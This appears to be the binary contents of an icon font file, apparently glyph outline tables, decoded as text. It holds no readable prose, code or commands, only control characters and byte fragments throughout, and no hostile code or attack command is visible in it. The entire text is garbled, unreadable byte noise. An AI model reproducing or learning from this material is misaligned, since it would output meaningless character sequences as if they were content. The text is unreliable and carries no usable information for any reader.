��`;;�����6>FN"&54>75.546267>767.5462$"264264&""264�
- 2
/B//B/9/B/��						�			0**	)!//!�*!//!*�	
 !///			��			7			�����/?%"&4?62?6/&?62/&?64&""'&4?620		-,~Y,-	(-*<-(		-,~Y,-	(-*<-��G�*	-,Y~,-		(-<*-�(	-,Y~,-		(-<*-����G��z�)12+"&=4>7>54&#"/.762"&4�Bn%%
H

,+?F:((:(�Z@ 1


"
![��)9))9����&735#"&=46;232+"&=462"&4p�6<**<*�0�00�*<**<����6"&46246;2+"&5�/B//Bh
^

B
1B//B/G

��


���;f2+32+"/&'+"&=46;7'#"&=46;26?632+"'&54>54&#"/&7>32		5;		>	.,	@		95		E	()	$		�



	

	1';#!	 	LT	 	HH	 	SM	 	AA@	 	%
	
.*$���;c2+32+"/&'+"&=46;7'#"&=46;26?632+"'&54>4&#"/&7>32		5;		>	.,	@		95		E	()	$		�##

	

	1';#!�	 	LT	 	HH	 	SM	 	AA��	 	/	
.*$�����%32#!"/&4762%37���`(���|PrD��(`(�(1}PC��@�K%2#"&#"".54654&#"&/054&54632>?03261
! $$#%54@p '#$#**")	2�#$##

0	M
2	20Ek��`�<6"&=4627232+"&=46;5.=46;26=463�P88P8@	WA8		�		8AW		B19T	`8(�(88(�(h	0Bc	"				"	iD(		*3NM80	������%F'&?6546326=46;22+"&=46;5.=7z	
��	
�8(,		L		�		8AW4/2


	�

	�-(8,�0		0*&�				"	iD),'"����
+!2#!"&54%#!"=46;54;2354;232�����X0(�(0��,$4444������8@6/&5#+"&=4675*.767&632347264&"��
(
�
)
	<!":
�			�t�

�!5

		L1-			���*2#"&="/&4?#"&54?>;>32264&"�D<b


3		h
1h&eH3 
�""�!2Hd'h
1
h		3


c
=C�""����"&462%2?64/764/&"gΑ�Α���ee�8�Α��V�ff�����2"&4'&"2?64�Α�Αj�ee���Α��V�ff�����6462"2?2?64/&"�Α��V�ff�YΑ�Αj�ee�����"&462764/&"'&"2��Α��V�ff�'Α�Α���ee�����B�BJ7"&?6+5#"=4;5.54632+>7#"&?6+"&'"264
DD#R044$9((7$440R#DD ���`DD'1�(
2(98'2
(�1'DDIWWI ����&2%2#!"&=46;5462+"&=4&#"54&"26���Y}Z
 
+*p""���f@ZY?

*+g�00����2"&4264&"62"&4264&"�Α�Α��ll�l�jKKjKf4&&4&��Α���l�ll��KjKKju&4&&4x�$"&46:"&4$2"&4H*<**<t<**<*��<**<*�<**<**<**<**<**<����2"&<62"462"B<**<**<**<**<**<*<**<t<**<*��<**<*����);2#!"&5463264&"265.'"3;265.'"33���,((�uS<U��~f����`��((Su#U<}�#�f����2"&4>4&/&7�Α�Αl���Α��k�����2#!"&5463!2=4#!"���,�����`��88����!"&5463!2'76/&'&���`��Fh `��b��Fh����*!"&5463!23?6/&7'&"?64���`��9�7g7 `��.�9�8	7��A�@&="'.54>3546463276#!"&546;2+!8�-?0	+-FJ/��
��y	3@�H
';(
O)*>&	H��Y`������>2"&2"&46.?67�GΑ�Αv	�B���Α��B�B����#!"&5463!2?6&+"���`��||�p��`�||����5463!2#!"&%'&;26`��d||�`���||����!2#!"&54676/&0`���||���`��||���B�E%#"&'#"&=4;&7#"&=4;>32'&#"32+32+32767	Mp!oH(>�
��
r&",VF@P,(#	
		 
��@�6%2#!"=4;5#"=4;54632'&#"32+354634��$O=7/			TT{`h(�(B7G#
$

@(3����*�A7+"&="'.?6;2654/.'&6;546;22'&+"�,-:$	 	0&"

B
g".A1	 	0&"

B
	�
T-!'0		0"	


4"1G0		0"	

	��@�4#32++"/&=46;267#"=4;&+"&=43!24I	;5L9�S�T'��)U(`(8F��5 (-(��n�:232+32++"=#"=4;5'#"=4;'&6;236?63_P:Xll8llX:PA77�� % \\ % �qH%#q����)27#32++"=#"=4;5#"=46;54;2'32654&#�\��;4444�@QQ�M$((#� (44( -�O�Qۖ)#"(��@�ENRZdh#32++"/#+"/#"=4;'#"=4;'&6;2376;2376;2327#32>?#;'&'#7#136?#4?FU*
9	+7*
9	)TF>0*
m	,
n
.0�x&Q��'Q (�		��		�( (Q		VV		VV		Q(�66/�  	66�  ����;#!"&546;#532�
�
��

Ƞ�
b8
��

�
z�b����)5>;#!"&546;54+";2=4+";254+";257#532�
�
��

�@������`�
b8
��

�
��LTz�b������&;SV%2+"&=4?061#"&=46;201'2/&6;46;2%+"/#+"&?6;23'��C9~C�PP0	 	($		+	$9(&_`;PP@		���		
�a������;SV++"&5#"&?62+"&=4?061#"&=46;2017+"/#+"&?6;23'kP0	 	0P1�C9~CT$		+	$9(&�P��		@P�n_`�		
�a�����$4DT7/&6;46;232"&=463!2#546;2+"&546;2+"&=46;2+"&�PP0	 	0-				��	�		�		@		@		�		�	5PP@		��$	 		 	p 		 		� 		 		� 		 		�����$4DT76++"&5#"&7"&=463!2#546;2+"&546;2+"&=46;2+"&PP0	 	0�				��	�		�		@		@		�		�	KPP��		@	 		 	p 		 		� 		 		� 		 		������4AV'&?6;232+"&=46;54632#"'&?67.74&#"3272'2/&6;46;25	+m
'% 02*

"]	
�PP0	 	N	):	�)0,*@
	
!	
PP@		��������4AV'&?6;232+"&=46;54632#"'&?67.74&#"3272%"&?6++"&55	+m
'% 02*

"]	
��PP0	 	N	):	�)0,*@
	
!	
�PP��		@���D72+"&=463264&"32#+"'&#"&=47>767632h

P

X e#


*!0H#5�
�

�
�y?#.) �M,:$���F46;2+"&56264&""'&'.'&=463276;23+
P

P
(#H0$

#e �

�

2��:,
(+� 
).#?$����$2"&4++"&=#"&?>;732e6%%6%�8
 
80
%%
�%6%%6��h

h�����$2"&42++"&=#"&=46;7E6%%6%p

@

%%�%6%%6k�
�

�
������/72"&4/"/&?'&4?'&67627664&"�P88P8V

^!
d0/d
!^

^!d//d
!cKKjKK 8P88P/d
!^

^!d//d
!^

^!
d�KjKKjK����".5463276EvE�j/7�]>J@EuFj�^6^y*���	%3!#!"&7;2=4+"%2#!"&=463 �
��
�hh 
	� 	
 ��
��
0		0
�����?E%+"/#54+""'"&4?&=#"&546;5'&4623762322#4
7=	
6(33(6
	=7

8/	
6�6
	/8
��\B�
 <
	7 �� 7	
< 
;.
	77	
.;B..����!"&5463!26=4&���`�|| `��d||�����2"&44&"2�Α�ΑH/B//B��Α�ΈB//B/���-C%&/#"&'&54>32+3276'#"&54673267�A>� #�		y�9%�W5Ig=2B.*?>
!	��$!	 	 {7/:gI7Y'3.B7)����:%2+"=&=4?5&=4?54;27676265463t{eP1		71		78�		��		�Fb�dp�)
)
E3)
)
�MH����3<%#!3#5#"&="=435"=435463352#!226&#"Q//4E��	�(B+*7"    "7*+B(�	E5�4
#$#��%@((@%��#$#
p((@����%=2#!"&546322>36754&#!"".'&'3!265����
J(
��
(I	I

���`�5 

 	5		5�

����%9+#!"=#"=4?622#!"=4637335335332!54;��x��
�0
8@@@@@$�`$@XX��

�����#./+"&?&54767'&47%67"&57n���	8	0
�p�p�!'"U<

ss
	"U�,q%%q,
 �`DNe7#?%2#!54+54+"#";&'&767?6'&'6732%463!!"&57;2?3;26/&+"�&�

��@@r			





 ��
��
;		<		9	 	�&&!�
��
@x
	


		



##l
��
8		
����%5EUen2+"&54632#!"&546;254&+";26=4&+";2654&+";26=4&+";2675#"&=#@

 

�

��

�
	.	�	 		 		 		 	�	 		 		 		 	 	�@
��

@
 
��

�
	.	
�� 		 		� 		 		y 		 		� 		 		w`	 �����)5=IUa2!54;463!2;2=4+";2=4+"2=4+"354+"754+";2=4+";2=4+";2��@
P
��((((4(t(�(((((( �

�8�((l((�((�TT�((l((l((����)462"6+"&=#+"&5'&462376x*<**<�	_



_	
VfV
Z<**<*P
^��

pp

^
	WW	�����(3?62#"&#"#"&546&.'&>.676.7>.>�L\>&"LM"&>,�/-	�*,�-/	�C_&&_j4--
&A7 !-4
-!7A&7!���6/&=46?7575����������N�
hh
�HNN��P�B���!'+/37%//&=4?54?65'75'57'57'�dhhdad

d"UwfffUUfffVUUfff�	n
2442
n	$l	&&	lI$E�))&��K'O�''*FK'O�''*�����8U7/;2+".?'&6?67&"/&?6276/.?+/&?6326/&?6�	(3
44$6	3)	n|	$	"
j*(	n	(�-`PP`

"
�

Q!(0A"QI

--B
n�5+0PP0!,

���7APa2++"&=!+"&=&=47#"/&6;7>;2%!'.+":>54&"!264&#":�	
 
�
 
	< �"9���9
"N	
		06

  

60		*
& *22
�!	���19BJ%+"&=!+"&=&=46?>;546;232264&"7!'.+"264&"� 
 
�
 
 +
�
+��5
�
�#0$)

  

)%0#U" 

 "�]C�������/%++"&?5#"&?#"&?#"'&?>2++z
�		`		�
P	O
nn
O	F11Z[
uu
[����##".=4632"&= "&= ��]=g<�]=g<���G2G���G2w.+!.+!{g++g1og++g1����&BKO7.4326673#!"&546;&'6'.32767326'&7#532'6�3
O��
��

�&$>$

O�
%+�(6V
	��

�
�
�$/
76 &
>"	�
�������<E;#!"&546;"&'&+"&'&+";27673;2?6.#7#532�
�
��

�9
	

%
%		&
&O�
b8
��

�
�
es		s_
	�		cX		���b����4=;#!"&546;6&+"4'&+";2767;26/7#532�
�
��

�<#%%#<<#"#<��
b8
��

�
�ED
]^=!$^��b����"=72+57#532;#!"&546;4&+";26=:>�

��
7
�
��

�5(!Q�=�
��
��

�
��!,�9����"-#5323#!"&546;"2645'&'&��
b��
��

�j''�(	g((F�b0��

�
�
((�p(h((0����*.O#5322"&5467;#!"&546;3533526/&+535#535#535##3#3#y�
�		w
�
��

h @� 2
           W
���

�
��

�
     ��&W
            a����!/=F;#!"&546;54&#";67764'&7&7647#532�
�
��

�@$$!
		O
	
)@�
b8
��

�
�l�$8$8	;n
N	*u��b����4#532;#!"&546;4&54&+";26=65��
b�
�
��

�`7
p

p
7F�b
��

�
��7&

p

&7����3G`#5323#!"&546;7654/7654/&#"32032?454/0#"764/&#"327��
b��
��

�s((AA5>>�A((F�b0��

�
�
�$$==1��g=$$����
!'2"&4%&'264&"'677&'67'�Α�Α�?�P88P8 @m?�@��Α��@�8P88P�?�@m?����#46#"&'46762654&'&5 QiBrCg�iQ:Ll�lL:��VCrC�gV�b?LllL?b�����6/&=6&'.7�
H
}@
 ���j
��P4M
Q%�,����%7#"'.?>3264&#"+"&=46632/546;2��gXD2@LllLI53�	2Hcg$A

)'͒7(l�l23	�2E��3�

h ����K+32+"&=46;5#32+"&=46;#"&=46;2+35#"&=46;2�	%%		�		&�&		�		%%		�		&�&		�	p	��	 		 	��	 		 	@	 		 	��	 		���� 2++"&5#+"&="&463�

(
 
 
 
B^_C�
 
��

X��

h^�^���#Gk%2#!+"&=#"&=46;546;2%2++"&=!"&=463!546;272++"&=#"&=46;546;2�		��	 	P		P	 	P		P	 	��		P	 	P		�	 	�		�	 	@	 				 			�	 				 			�	 				 			����%%2"&547'#"&46327&5462#"'6`(88P8f"(88("f8P88("ff�8P88(
@8P8@
(88P8@

@����5#!"&5463!2"'64'73264&"&#"327264&���`�DD!!.!D!!D!.!!p��`�))!.!!)!.!)!!.!���'/7?O"&4632762?2+"43&2"=&?6'&6/&6463264&#"26�4z�zzV-)4M0.	U	;	��&		(8		h4)-Vzz�z4<+					�&		8(		����%*"&462'7&''77'77'?6'7��Α��a?"'>KK>'#?&U%>>%U&�NN'Α�Α�:T6**6T:B4"MM"4\88\
���!-9EQ]iu�����>#"/&5417&0#"/&54+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2D��D
+W``W+`((`((`((`((`((��((`((`((`((��(( ��`((XD11D

E#
<##<
#E�(((((((((�(((((((�(((((���	3=A#546;246;#+"&=>%+"&=#532%2#546353�`	@	��
` 
`


�
`
 `		��	`	p@�00		w
��

,$;)%-9)G,,

��	w	00	�������#+54622+#5.=#"&=4637#54620		I7@7I		p@0p

p	 	 :XccX: 	 	p

@�&2>JV2#!"&546;54632=#72=4+"3!2=4+"3'2=4+"3!2=4+"372=4#!"3(
�(!
(
(��h�8�h�����
��!

����``((������,'& /&47>2"&4%'&"/&4762{"n��n"W��6%%6%"?�?"W�%"dd"Q99��%6%%6y"

66

"L����/?O_o2#!"&546354&+";26=4&+";2654&+";26=4&+";2654&+";2654&#!"3!26���P&&&&�&&&&�&&��&��`��M&&�&&{&&�&&{��ff������#/7'&?66754621%#".547>"&53z	
��	
�%=8H	�~��		�&�


	�

	p1


V:,C
��	
2�%����!2#!"&=46;76;2!+"&�		�`		x	r	�����	 		 	

�MS������82"&4654/.#"&546326?654'.#"32>�Α�Αm
#'("$
>R$C) 8��Α���"	0 !+#	R=)B&����:F2#".'#"&546326;2>54&#"3276#"&462654&#"j�JL
*,4Q9*- jNLllL6-
	=Jg��Q%$�|d?T91BVy
2JVl�l	(�Α��)) ���#?+'754"/&4?62763~�~-8  �8M
)�)
Ms~�~  8-`8PM
)�)
M�����,70#"&532762#"/&54>76�XF:@@
j UP.
@	'%?�J8@XC			
D:�a5	#8����#4?JU%"&""&#"#"&"#546;5335335332!526226226323"&546523"&546523"&54652�'/''(
'/'@@@@@�@''/''/'
'��
 
r
 
r
 
@      P�������`      @
%&
%&
%&�%2#!"54;2%6!57>��(5Z��W
U@(h����h�r����!�#%2/7+5463&'&676
=��	�
Y���<K`�wZ�S:
�A
�	���+�`\�	�2%2#!"&546;22/"//&?627'&63�		�0
	 	�	 `

I.D

II @	 	
P		�� 	v `		J.E		JJ @�2+"&463264&"264&+�PppP�PppP�KjKKj�5KK5111�p�pp�p�jKKjK�KjK7�7@�2+"&463264&"�PppP�PppP�jKKjK�p�pp�p��KjKKj������8<KQg2'.547'+#"&546327#"&54>;23'#"&=46;263&267#"&?&#"?#654&#"&/5KK54K)V
4E,5KL41
W	r3		@
N��+J(	Q-	!//�J�$�"2/!

-

-,M55JK48&�*6K64K0
			}J&vI/B/`x( 0`0"!/H
	G,���4<LT2+++"&=#+"&="&=#"&=46;5462264&"7!26=4&#!"264&"�


 
�
 



�����0

�
@
P
� 

  

 
�
P
0".."0��]
�

�
p�'?2#!"&5463&546?6'.676/&&546?6'.676/&��`�=@RA?S�>@RA@R��� �%"4./6%"4./6����94&++"&546;2+"&52+"&546;23265463�!p	0	
�8P	0	�	P8�
	0	p!	!��		�
P8�		0	��8P
		�!(	��B�3W%!!2#"&'&7#'.'4>7#"&=46;2!2'#54&+"#";;26=326=4&���
 ! �#
	FF

g
	�/t0		0		0		0		� #! !W

	-��(		(		(		(		��B�3F%!!2#"&'&7#'.'4>7#"&=46;2!2'#54+"#"?6&���
 ! �#
	FF

g
	�/y++DD� #! !W

	-��<<DD����<D%32#"'+".'#"&=463267'&6?546;546;232%7625�=,

X70�#7X

,>
F*
@
�
@
*��v
vK")

;!;

)"F
#�
(

(
�#
�X&&X����26:V%#!"&=467'&6;&5&54767>?6327/77475#"'0326762676�#��%
:@F

F@;
� 2�*2J,42.	�=#--$><!

1"		"1

!�x( �� (�������HWm2'"&547'+#"&7>767&+"&546;23'#"&=46;276;2+6267#"&?&#"%6&#"&/7>4KL64K-

TE,6KH2 8

8E�B		P&-

R ��(	Q)!//�0"1

22"+K46LK4;')-
*6M63H

( 		&*
 
7�K/B/L"2Q
R "0+���$@%"&54672654&'56&"&462"&=46;2732#+"&5pAO�ԖOA!3z�z=3M6%%6%�
&

@
v.(88(.	!!�%6%%6�
``
`

�����
)%3"/3727#'&"'&"#&6?62762@m��^9�$!w1:$f!$&n''n&�,��H		
%i(7		b�	
V(i%((''�� �!)32++"=#"=4;5.5462264&" ?1$$($$1?TxT�/B//B3N4($$(4N3<TTB//B/�� 2/"&46327'&63264&"tQTxTT<*#P�B//B/�OP#*<TTxTQ��/B//B�� �;C%32++"=#"=4;5.547&'&'&6;227676;2264&" ?1$$($$1?3&(
F
(&3�/B//B�3N4($$(4N3C+ /

/ +"B//B/����192/32++"=#"=4;5.546327'&63264&"tQ?1$$($$1?T<*#P�B//B/�OP#*3N((N3<TQ��/B//B����PX2/32++"=#"=4;5.547'/&?'&=4;276627'&63264&"�Q?1$$($$ 3			O	#T#P�B//B/�OP#*3N(((;"*#	O	Q��/B//B���!)W32++"=#"=4;5.5462264&"32++"=#"=4;5&'673264&#"&'632 ?1$$($$1?TxT�/B//B!$$($$"!//!"'2<T?3N4($$(4N3<TTB//B/�4($$(4/B/ T<3N���!N2"/"&46327'&63264&"%2"/#".'672654.#0"1677'&63T
1TxTT<*#0�B//B/�
1T<%?'!/B/%!0�O0#*<TTxT1��/B//BQO0#*<T";$!//!%!1��@�&HP2"/#"'673264&#"&'6327'&63232++"=#"=4;5.54264&"4
1T<2'"!//!"'2*#0�oxT?1$$($$1?oB//B/�O0#*<T /B/1@T<3N4($$(4N3<�/B//B��+32//"&54>327'&?67'&63264&"t			TxT'B'*#	�B//B/�O			#*<TT<'B'			��/B//B��!�,47"&47675#"&=46;5#"&?6+32+64&"�*TxT*(88('//B//�*xTTx*	(88(	�/B//B/0�P(0%&=#+"=#"&462354;2354664&"�		8(	*xTTx*	(�//B//�8(*TxT*(�/B//B/�� �+"=.5462264&" ?1(1?TxT�B//B/3N��N3<TT�/B//B0 P"264&2"&4�B//B/�xTTxT/B//BoTxTTx	���/7?OW_!"&=463!2&"264&"264!"&=463!2&"264&"264!"&=463!2&"264&"264�@

�
3NX�@

�
3NX�@

�
3N 
@

@
X�
@

@
X�
@

@
X����#+?%2++"&=#"&=46;546;2"&4622#!"&=46;27p		@	 	@		@	 	��jKKjK&7O��O7#L#�	 	@		@	 	@		@0KjKKjkO7**7O����#7%//&?'&?676"&4622#!"&=46;27N-..--..��jKKjK&7O��O7#L#�.--..-->KjKKjkO7**7O��+6"&462%2+"&=!+"&546;235463�B//B/.B	 	�	 		 	�	�/B//BQB.�		00		`		А	����'/##!"&?"&546;254&#!"3!26"264�N4?��?4NO1�2N0
��

0
�.!!.!`�'9229''99�p

p
6!.!!.����'7?G##!"&?"&546;254&+";26754&+";26"264$"264�N4?��?4NO1�2N�
h

h
�
h

h
((��((`�'9229''99�p

p

p

p
.(((( �`!%!!535#7232+#!"&=463!5 � �  

��` �@@�
�
�`�� �`!%!!535#7232+#!"&=463!5 � �  

�p�� �@@�
�
�`�� �`!%!!535#7232+#!"&=463#5 � �  

�� �@@�
�
�`�� �`!%!!535#7232+#!"&=463#5 � �  

��� �@@�
�
�`�� �`!!!535#7232+#!"&=463 � �  

� �@@�
�
���D�%#&/&546.j81
5W	w��Y	
�	�����H#"32+72#".'#"&=4632=#"=4;54".=4>32>32T$$T-.T$$T-.�0p(p1((0p(p1(���,8G32+"=!+"=4;#"=4;2!54;2+;2=4+"54++;2�(��((�(����@T
H�@��((@((���H
4��@�+]7+"=4;5#"=4;2!54;2+32+"=732+"=!+"=4;53;26=4&+5354;2+@44 44�4��4�
@

h4�4�44�4@�44H

@
H4����%"!"&5463!2+538
��

�
b
��
�
�

��7b�
���!2#!"&54633#!"&546;������0/��� �`0 �!/������47c%"&5054676762'3#"&505467>762'3'2#!"&=46;&'#"&=46;6232+KjK

<

�H��";#5K

<

ȐH		�`		�&�		�N�		�&p!//!<4&(59	��%/!<

(59	���	 		 	')	 	  	 	)������*02#2#!"&=463467.5"&=4634&"h

D55D

��

D5#7

=V=�

CkkC



Ck8O-

�@;UU;����*062#2#!"&=463467.5"&=463."65#h

D55D

��

D5#7


2<2
���

CkkC



Ck8O-

��$,,$""����*02#!"&=463467.5"&=463!2265#hD55D

��

D5#7

P
�V=��CkkC



Ck8O-



�U;;����*2#!"&=463467.5"&=463!2hD55D

��

D5#7

P
�CkkC



Ck8O-



���?2+"&=4/&=463254632354632354632346�

0�
p p
�t
d+B0�0/ ������82+"&/&>54>32354>323546323546�

�
}
!	 



@�q�!
,���ױ�W���.4635#"&46;5#"&46;5'.7>7>+"�  �в$�	
p�P	""(E
K@
� ��@�&54/&+"&=46;26?6&+"&=463!2�p�
%|

�!
N
� =G
%3	!

	��t�����7+"/.>5'&>763'&67637>376� $��!='
#
040 ,c�*
Y
~!9P�
	������������-159%+"/&>46235462354623462#37#37#3� ��
!	 """"�XX�`��!
,�((a`````������-$2+"./&6?'&>354623546234�" �@K%$E("�P�
p
	�$���   �`G2++"&=#"&=43+"/5#+"/#+"&76;236?6;2U6Ut
6		2		6A	+	+	A`+��+��
�6"UU6�(5 ����*%+5326"&462&'654+";26=3;26ۑΑ��+&jG		
,�8'Α�Α��O2Y
�

HS
����#2+32#!"&46;5#"&5463!P�

��

������  @�� ������+G!"=46;54;2354;232!2#!"&544+54+"#";;2=325��X0(�(0�L���H<(<<(< $4444$ ���<<(<<����+7!"=46;54;2354;232!2#!"&542=4+"3��X0(�(0�L���<� $4444$ ���((����+G!"=46;54;2354;232!2#!"&5476/&'&??6'��X0(�(0�L���
0			00			00			00			 $4444$ ���0			00			00			00			����+;!"=46;54;2354;232!2#!"&54'&'&?6��X0(�(0�L���Y	j.			R	�	 $4444$ ��`	j/	T�	���6#!"&546;276�
�0

p
���

�

�XD�� �	727"/2"&4724#"2546pxTTxT�&6(��!!�TxTTx6&(�����$9#!"&=46;546;23253+"&2#!"/&?6;53�+	�

�	 	�	�@	 	�

�	++	�@k,	
P
			�9pp		
P
	,,	  ��@�
4>?&576
�����	
�J
8��?
0�@�����
8����2+&=#"&5463�&&�}
`&&�&��&^T& &����'2"&454&+";26754&+";26�Α�Α�	0		0	p	0		0	��Α�η�		�		�		�		����2"&454&+";26�Α�ΑX	�		�	��Α�η�		�		����!)3#!"&535462#354&"264&"264&"``/!��!/`KjK��&4&�� ��!//! 5KK5  &&���@�*6BN%+#!"&/#"&=46;7>3'&>3254&"26754&"26'54&"26@

��

CkP�PkC
��p��
��

�mm��p

p

p

p

p

p
������CG+32++"&?#+"&?#"&?6;7#"&?6;76;2376;2327#�
OK
P
(b
)K
OK
P
(b
)K�c

�	(
V
	RV
	R	(
�	(
V
	RV
	R	���������-6"&462&"2642"&4264&"32+"&76�\BB\B\((�\BB\B\((h ��"	p�B\BB\^((�B\BB\^((��0
�
����G"264$2"&462"&46"264>."'&67673>'.56V�zz�z��Α�Α��pp�p�RHLH5	




	�z�zz���Α��Yp�pp�DM

/A.!!.A/����B#"/67'&/"&462&/&#".?5#"&=76;2|}~�?$$$ofB6

= ?��Ú
X<$$��'l�	
��P
_O		�7G7#76772+57#!"&5463!2'&+";2?3;2>74.+";26�		�/��`���9	$9	4	�-99.5�

1b_�� ��		T+�4����!3CS.676#"#'7232#"/&764'&?67/&764'&?6/&764'&?6a@-.?
@ 8  8 @�		_--
	%%	
&

;@��@
(
QZZQ
(�"V6�6
	-t-	7#X#
	B	��'/7?GOW_6"&4622"&42"&42"&42"&42"&42"&42"&42"&42"&42"&42"&4�%6%%6(6%%6%�6%%6%6%%6%��6%%6%�s%6%%6��s%6%%6��s%6%%6��S���8@H`d7"&5462"&54&"&2#"&4632654>54&""&542"&42"&4%"&54=.'.7>'7�/B/1�g?-FdFSmQ@
	Qf��"P"�!//!
�gI+	-?%&2FF2I�m�Do	�V�"P"������2At�&2#2#'&/&?6766766&#"32763&%.6767&'&>767'.7>7"'&63"&7>376"#32654&# !=+^C,:)
F
"(-+
%

	
p:)
F
"(	-+
	 !=+\C�

3

	!Y	!JZ9
	


A
4!JZ9

	


3

	!G�����8DQ7"&5462"&54&"&2#"&4632654>54&""&54%/&?6"/&?6�/B/1�g?-FdF�		W	W	��		�
		��!//!
�gI+	-?%&2FF2I�	W	W		��	�	�	������2?k46;5#"&546;5#"&546;5#"&746;'.>+"&7'&6767154/&'&6767'&6767'&676'&>[
>~��}�
	|PkI%		

�
={4	
N^
	_M
	g$Z
��.

#

0ZC	
cy
	zb
	�&����@�-E%&'#"/&'&767'&6?6632654&#"6"326591W+
��)w
}q<1W+
5(*Y��"P8*&�T+:
e	
��:��(fT+:
H
W�'38P	
=���� (/7W2&/76'&"&'&4757633#"&5:64&"3#&"264///#576;?�
	7�

P
"


b	
�`@
)			��`
				�
		
 	5[7	
TR;�	7�vI
!Z@�
			)�
@			

	&
R�7	K<���F#!"&547670>321&0#".'&'&2>767654'�`)||)B#G
G#	$FF$ Z		Z B3		32


2����'/D#32+32+#!"&5463!232&"26454&+"'#";26���@�4&&4&0'*
	�	
 @(@(0�0( &4&&4�"��@�+7CO2#!"&5463"26454&+"'#";26754+";2=4+";2=4+";2� �4&&4&0'*'
	�	
����������``&4&&4�""=HH����2"&4$"26427.#""'&#"�Α�ΑH44H4��94 ( 4��Α��14H44H��D!!����#72#!"&5463";264&#"26454&+"'#";26P��`		`		4&&4&0'*'
	�	
��`� 				�&4&&4�""��@�	+7?R2!5463!#!"&%;2=4+";2=4+";2=4+"&"264;26'.+"'#"��0@� `�������4&&4&�
�
"*��p0���HH�&4&&4�
�����3C#0#"&54754622654.'54&"37"&5475462� K55J 8P8`!/(%A%6%  `�%05KL50$�(88�h/!			��
		%P%%%�

������"C7"&54754627#0#"&54754624.'54&";26�%6%    K55J 8P8(%!/@%%%�

�0%05KL50$�(88(��			��
		%/�����"C7"&54754627#0#"&54754624.'54&";26�%6%    K55J 8P8(%!/@%%%i

i0%05KL50$�(88(��			��
		%/�����"C7"&54754627#0#"&54754624.'54&";26�%6%    K55J 8P8(%!/@%%%)

)0%05KL50$�(88(��			��
		%/�����;6"&4627#0#"&54754624.'54&";26�%6%%6E K55J 8P8(%!/[6%%6%%05KL50$�(88(��			��
		%/���!)19AIQYaiqy����"/&47.7&#"#4632662"&462462"6"&462"&46:"&42"&462"&462462"6"&462462"6"&462"&462"&462"&462"&462�� .@S;7):
			)			W			�			2			`			�			)			W			w			W			W			I									8�O. ��2;S%H									)									)									7						)							)			)			���F%2++"&=!+"&=&=#"&=46;5463266/&7.7&#"�

 

�

 

/!*$_	
	
�

 + 



 + 

�!/"
	_/
�����+QY"'.542''&546'&'&7654&2&767>54.#"'.542"&4J�u.W=9R0;)%5��F8%,!+6Ig*$9E�6%%6%)U,,U�
+>=UQ9A,
()95%+�]BlN.5, gH-NlB]%6%%6���2#!"&546354#!"��`������`�TT��`%2#!"&=463��``  ���!)+54&+5463!2#!"&5463!24+"30/!� ��� D������!/0��� 04	���/?O_o�+"&546;2++53232++53232++53232++53232%3#"=#"=4;5473#"=#"=4;5473#"=#"=4;5473#"=#"=4;54���`********�********��`�N0f0f0f00`0`0`0�������%/&/"/+"&="/&4?5/.?/&?'.?>7'&/&6?'&?6'&>?65'&4?6546;2762?>76/76�!?5

 	
6?!"F@@F"!?6	 	6?!
"F@@Fg

G$N5
(		(
6N$G

%%

G$N5
(		(
5N$G

%%����	�'"/&4?&67>�(0$X%�	3	�
$1��*�1$
�	3	�%X$0����*<+"&?.5476227>56227562.>32+"&7�% 

@

,,,y,"*9

8�_"&7�

�*"_�G;����#VLB&
�0

����&2#"'&?632676&+"&=466CrC�g_G
	(0?FaeEB0*�
$G�BsCg�@	(*bEGc,*
�$E����	!-E!#!"&26=4&"26=4&"26=4&"%2#!"&=46;76;2 ���				`				`				@		�`		x	r	P���		�		�		�		�		�		�	 		 	

����:&#"+"&7>3276+"&73232>76;2#"'&=46s1B:[
9�ZcH$
��׆*1B&D0	
9�ZcH$;-G8		WsE$�
y*-!9%		WsE$�
����"0%"&54675#"=4;2+7654&+";2�z�zeKx8,			"�((�VzzVMu"(("	$			3b������1%&=#"&=46;546+"&=46;2+";2��

����T(88(TT

T��`
`
`��8(�(8(
�
���1!#"=4;26=4&+"=4;2'&=#"&=46;546�TT

TT(88W��

�(
�
(8(�(8��`
`
`����$276+"&?&'&3276#"&46dG$
�*0BEeaF?0(	
G_g���E$�
*,cGEb*(	@�Α���08DL%#!"&5467&546;&546;2654'6323232$"2646&+"26&264&"�#*��*#*&!/	(8&*����<8<%O(**(#*&/!8(&*#[x  `��@�!)4%#!"&546;3%#!"&5463!24&"2!5'&'&���/!������((D`X�( �!/PD((`0pX�(�����
!(/&?62'6&?6?6&5#75�.	o		.(<�	o		��z\
�

�$$ @2.		o	.<(		o	��z 
�

�h0@ $�����&?'762#���r
�9�9(c���
r)(9�9�����	!'762&7>?'/&?62�9�9(�US�"r/7"�fw!v(9�9(TS�"7/r"�fv
����732"/&6;4;2�.VV.8fVV.��M�37/&4?6!2#�VV.�.VV.8M�3%546&=!"=43:VV���.VV.8
����#"&?62++"5X.VV.8VV������;%+"&?'+"&=467'&=46;27'&6;2/76�
p$kk$p
$kk$
p$kk$p
$kk$hp
$kk$
p$kk$p
$kk$
p$kk$����)#!"&546;46232&"26454+";2���P&4&P�H��P��`&&4d��M346&=#/&4?63zVV�VV�VV..VV.
����72"/&6;5#"&?62+�VV..VV.FVV�VV�����"&462#"?6&+54+"��Α�ΓGssG@'Α�Α�tsst����"&462'#54&6=32=4gΑ�Α�tsst8�Α�ΓGssG@����2"&43?6/&#"�Α�Α�tsst��Α�ΓGssG@����6462"75326/&;;2�Α�ΓGssG@YΑ�Α�tsst��@�2/"/&4?'&6;26#!"&5463!2#!!547@$��$�
���(
��@��$��$��
�`���
����##!"&5463!2#"?6=4&���`Xp �			� p��`$ �			� p
���+5463!546&=!"&2#!/&4?6
hPP��
�

��PP
0PP0�

0PP0����1%#!"&54674546326326&+54&+"#"7.K5��<T6*^B,J(8�A	0	Aj�$65KT</JB^,$8(ip		pj����1%#!"&546745463263226/&;;26=.K5��<T6*^B,J(8�jjA	0	�$65KT</JB^,$8(Njjp		p��@�#'#!7#3#3'!"'?3&�ZeE0E��E�PEee{G�C{e������� ����B������E�%"/&6;#"/&6;232:hh
@T8�
@8pp8
������E�++"&?6;#"&?62:
@
�8T@
hH��
8p��@�&2+"&=4&#"32#!"&=46;54i}Z
 
+*0����Y?P

P*+G��F@����.5462"&264&"�="
p�p
"=B//B/6#X$5"PppP"5$X#
